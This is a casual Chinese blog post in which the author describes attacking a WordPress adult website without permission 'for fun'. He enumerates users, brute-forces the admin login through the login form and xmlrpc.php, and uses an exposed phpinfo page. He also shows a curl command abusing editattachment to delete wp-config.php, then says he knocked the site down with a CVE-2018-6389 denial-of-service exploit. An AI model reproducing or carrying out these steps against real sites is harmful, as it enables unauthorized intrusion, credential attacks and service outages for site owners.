在家闲的没事琢磨色网站的我
文章来源:渗透云笔记
大家好,我是在家闲的没事的天钧,因为太闲了,用关键词,找了个*色网站,搞着玩。
重马赛克,首页长这个样子
首先注册了个账号,试试。云溪扫描如下,有意思的来了
通用后台地址试试/wp-admin.php被自动跳转到用户登录页面了,在看看/wp-admin/install.php
覆盖安装尝试失败了
但是确认是默认安装方式
WordPress默认安装情况下,根目录会留有开发人员编写的readme.html文件,通过访问该文件,我们可以大概的知道站点的WordPress版本号。
但是在4.7之后的版本就不会显示了。
这里没有显示,用wpscan扫了下,出了版本
果然比4.7高。额,先去看看有没有别的有意思的漏洞
随便输了个数字用户倒是很多,但是主要负责更新的账户只有一个,用户名为yi,拿wpscan扫扫这个站
先去看下别的。看完后没什么意思,转到登陆框,尝试admin的账户破解,在用户读取的时候确认了有admin的账户
使用小米范大佬写的弱密码进行爆破尝试
爆破并没有成功,烦躁,继续,找到了xmlrpc.php文件使用它进行爆破
利用下,看看
发现hackbar居然要钱了,呜呜呜穷逼找了个代替的,本来是想用burp的,但是咋弄也连不上,苦恼。
但是我却找到了他的phpinfo文件了,这管理员是多粗心 版本7.3.7
漏洞倒是不少,用通杀试试
curl -v "http://127.0.0.1/AllCMS/wordpress/wp-admin/post.php?post=4" -H "cookie:wordpress_740bcb2571e381529497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7C5d84d42cfd206a46b5ff58555265887d796e9963772c58eed1795fd51a6a6c0a; wp-settings-time-1=1531966453; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1532135657%7CImRdA39DcGX49tYIkvpmjYiiAWfVqYZl6zOQhoXWvhx%7Cd619b7954cb029edc28d923c5c45102c287110e124f012310aeaac1ee261887d; EJfX_2132_saltkey=w788x9t8; EJfX_2132_lastvisit=1531658111; hibext_instdsigdipv2=1; EJfX_2132_ulastactivity=8d850QpqXg15uPhEnqPt06yqLGsQxp3dko9XHY1WvSkslMa%2FWls0; Dl6Y_2132_saltkey=kj2hJJBQ; Dl6Y_2132_lastvisit=1531700649; Dl6Y_2132_ulastactivity=a1c1FdoVaiPz3buc%2FbOAzOuCRV9lu%2BXjPkbAZPdLCiN3sSGZE%2BAx; _ga=GA1.1.1487148300.1531791208; _gid=GA1.1.579984730.1531887964; security_level=0; wordpress_logged_in_740bcb2571e381529497b6b37b468e91=andy%7C1533129085%7CYQZJuAiCl0ev8J49HqsLCdHwMIuQLgFNoYtiMx7t2DB%7C8a009796bbdd71150a609fd9b05250f17b55307b8908c37e4fb57ec4871f6439" -d "action=editattachment&_wpnonce=05447e2e53&thumb=../../../../wp-config.php"
这个没用,但是他有通杀DOS漏洞CVE-2018-6389
苦笑,再弄会,已经坐了半天了,弄不出来再利用6389,然后找了一会,对象来电话了,她忙完了,我急忙下了个exp
然后去大佬博客观摩下
操作
打死
匆匆离去,等我有空再搞!!!!
反思:
从漏洞利用上还是差了很多的火候,需要补充,自我感觉基础还是不足,还需补充,但是最近发现自己的效率低下,专业技能下降,还是需要读打些火候,各自加油吧!
作者很菜,大佬勿喷!